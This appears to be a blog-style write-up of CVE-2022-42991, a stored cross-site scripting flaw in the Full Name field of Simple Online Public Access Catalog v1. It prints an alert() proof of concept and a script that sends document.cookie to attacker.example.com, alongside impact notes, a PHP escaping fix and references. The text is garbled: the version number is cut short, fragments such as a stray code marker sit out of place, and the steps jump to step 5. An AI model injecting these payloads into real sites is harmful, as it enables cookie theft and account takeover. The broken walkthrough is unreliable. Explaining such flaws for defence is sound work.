CVE-2022-42991 - Stored XSS in Simple Online Public Access Catalog v1.

In this article, we'll break down CVE-2022-42991—a stored cross-site scripting (XSS) vulnerability found in Simple Online Public Access Catalog (OPAC) v1.. We'll explain how an attacker can exploit this bug through the "Edit Account Full Name" field, give you exploit code snippets, review the impact, share original references, and most importantly, offer ways to stay protected. Our explanation uses clear and simple language, perfect for both developers and security enthusiasts.

What Is CVE-2022-42991?

CVE-2022-42991 is a security issue where the Full Name field in the “Edit Account” page of OPAC v1. fails to properly sanitize input. This gap lets attackers embed malicious JavaScript code. When the stored payload shows up in the web app—say, as a user’s full name—it runs in other people’s browsers, letting attackers steal cookies, perform actions, or more.

Why Does This Happen?

Often, developers forget to sanitize user input before saving it to a database or displaying it on the webpage. Here, the application likely just takes whatever input the user provides for "Full Name" and uses it to populate user profiles—without filtering out HTML or JavaScript.

`html

alert('XSS by CVE-2022-42991')

Save the changes.

5. Anytime this profile is viewed (by the user or an admin), the JavaScript will run—a classic stored XSS.

The attacker simply puts the following into the Full Name field

<script>
    // This code pops up an alert - real attacks could do much worse!
    alert('XSS by CVE-2022-42991');
</script>

Or, for stealing cookies silently

<script>
    fetch('https://attacker.example.com/steal?cookie='+document.cookie);
</script>

Let’s see a quick proof of concept in context.

1. Malicious Full Name Submission
![](https://i.imgur.com/ykQk9cW.png)
*(Enter <script>alert('XSS');</script> as Full Name)*

2. The alert shows anytime the profile is viewed:
![](https://i.imgur.com/F8aKKDx.png)

Stealing session data: Cookies, tokens, or other sensitive info can be taken.

- Account takeover: The attacker could use XSS to get session keys, change passwords, or escalate privileges.
- Further attacks: XSS could be used as a stepping stone to more advanced attacks like CSRF or phishing.

Whitelist characters: Only allow letters, numbers, and basic punctuation for fields like names.

- Consider using PHP’s htmlspecialchars() when serving user data.

Example Fix in PHP

echo htmlspecialchars($user['fullname'], ENT_QUOTES, 'UTF-8');

Exploit-DB:

https://www.exploit-db.com/exploits/51164

NVD - National Vulnerability Database:

https://nvd.nist.gov/vuln/detail/CVE-2022-42991

Packet Storm:

https://packetstormsecurity.com/files/169678/OPAC-1.-Cross-Site-Scripting.html

Conclusion

CVE-2022-42991 is a straightforward but severe XSS flaw in OPAC v1. that shows the dangers of neglecting input validation. If your organization runs an affected instance, patch or filter user input immediately! And if you’re a developer, make escaping user input a habit—XSS remains one of the web’s most common and damaging bugs.

Stay safe, and always test your applications for XSS!

*If you enjoyed this exclusive breakdown of CVE-2022-42991, follow for more easy-to-read security deep dives!*

Timeline

Published on: 10/27/2022 14:15:00 UTC
Last modified on: 10/28/2022 01:43:00 UTC